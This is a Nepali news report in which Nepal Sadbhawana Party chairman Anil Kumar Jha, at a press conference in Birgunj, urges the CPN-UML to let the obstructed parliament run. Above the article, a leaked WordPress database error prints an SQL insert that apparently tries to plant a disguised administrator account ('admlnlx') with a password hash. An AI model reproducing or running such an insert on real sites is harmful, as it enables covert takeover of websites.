WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bw/b5cqND3VxDaUq.a6kkw9jtDshBv1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 13:11:11', '', 'admlnlx', 'admlnlx')
पर्सा ,पुस ८-
नेपाल सद्भावना पार्टीका राष्ट्रिय अध्यक्ष अनिलकुमार झाले अवरुद्ध संसद् सञ्चालन गरी मुलुकलाई निकास दिन प्रमुख प्रतिपक्षी नेकपा(एमाले)लाई आग्रह गरेका छन्।
एमाले सरकारमा रहेकै बेला तयार पारेको संशोधन प्रस्तावलाई वर्तमान सरकारले संसद्मा दर्ता गर्दा सोको विरोधमा संसद् अवरुद्ध पारी मुलुकलाई असहज परिस्थितितर्फ डोहोर्याउने काम एमालेले गरेको उनको भनाई थियो। अवरुद्ध संसद्लाई सञ्चालन गरी मुलुकलाई राजनीतिक निकास दिन एमालेलाई झाले आग्रह गरे।
नेपाल सद्भावना पार्टी, पर्साले वीरगन्जमा आयोजना गरेको पत्रकार सम्मेलनमा पूर्व मन्त्रीसमेत रहेका नेता झाले राजनीतिक दलबीचको असमझदारीले लोकतन्त्रलाई कमजोर पार्ने बताए।
लोकतन्त्रको विकल्प हुनै नसक्ने र राजनीतिक असमझदारी वार्ता तथा संवादबाट समाप्त पारी मुलुकलाई निकास दिन दलहरु सक्षम रहेकाले निकट भविष्यमै एमाले पार्टीका नेताहरुले हाल देखिएको गतिरोधलाई समाप्त पार्दै मुलुकलाई निकास दिनेु अपेक्षा आफूले लिएको झाले बताए।
संशोधन प्रस्तावको विषयलाई लिएर लामो समयदेखि संसद् अवरुद्ध भए पनि काँग्रेस र माओवादी केन्द्रका नेताहरु अवरुद्ध संसद् सञ्चालन गराउनेतर्फ गम्भीर नदेखिएको उनको टिप्पणी थियो। रासस